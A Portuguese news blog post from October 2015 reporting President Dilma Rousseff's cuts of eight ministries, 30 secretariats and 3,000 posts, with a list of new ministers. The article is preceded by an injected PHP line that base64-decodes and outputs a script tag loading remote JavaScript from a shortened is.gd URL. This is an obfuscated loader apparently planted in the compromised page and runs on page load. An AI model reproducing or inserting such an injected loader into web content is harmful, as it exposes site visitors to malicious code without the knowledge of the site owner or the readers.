$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Dilma extingue oito ministérios, 30 secretarias e três mil cargos

02 Out 2015

A presidente Dilma Rousseff anunciou, no fim da manhã desta sexta-feira (2), os cortes de gastos na administração pública, com redução de ministérios, secretarias, cargos, além de redução em salários de ministros e meta de redução de despesas no custeio das pastas. A presidente não informou qual é a economia prevista pelo Governo Federal.

Anteriormente, a presidente havia anunciado o corte de dez ministérios. Contudo, somente oito foram extintos ou absorvidos por outras pastas. O Ministério de Infraestrutura, que surgiria da fusão das secretárias da Aviação Civil e Portos, por exemplo, não foi criado.

O Gabinete de Segurança Institucional perdeu o status de ministério, e a Secretaria de Assuntos Estratégicos será extinta. A Secretaria-Geral se uniu à de Relações Institucionais e passa a ser chamada Secretaria de Governo, que vai ser responsável pelo Gabinete de Segurança Institucional, Secretaria da Micro e Pequena Empresa.

O Ministério das Mulheres, igualdade Racial e Direitos Humanos foi criado, com a fusão das secretarias de Direitos Humanos; de Políticas de Promoção da Igualdade Racial (Seppir) e de Políticas para Mulheres.

Além do fim dos oito ministérios, Dilma também afirmou que cortará, ao todo, 30 secretarias ligadas aos ministérios cortados e também aos que continuam em funcionamento. O objetivo é o corte de 3 mil cargos comissionados em toda a administração.

Na economia de custeio, Dilma determinou a rediscussão de contratos e cortes em gastos com telefones e carros, por exemplo. O objetivo é diminuir 20% nesses gastos.

Outra economia será nos cargos dos ministros, que terão vencimentos 10% menores.

Veja nomes dos dez ‘novos’ ministros:

– Casa Civil: Jaques Wagner
– Ciência e Tecnologia: Celso Pansera
– Comunicações: André Figueiredo
– Defesa: Aldo Rebelo
– Educação: Aloizio Mercadante
– Mulheres, Igualdade Racial e Direitos Humanos: Nilma Lino Gomes
– Portos: Helder Barbalho
– Saúde: Marcelo Castro
– Secretaria de Governo: Ricardo Berzoini
– Trabalho e Previdência: Miguel Rossetto

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *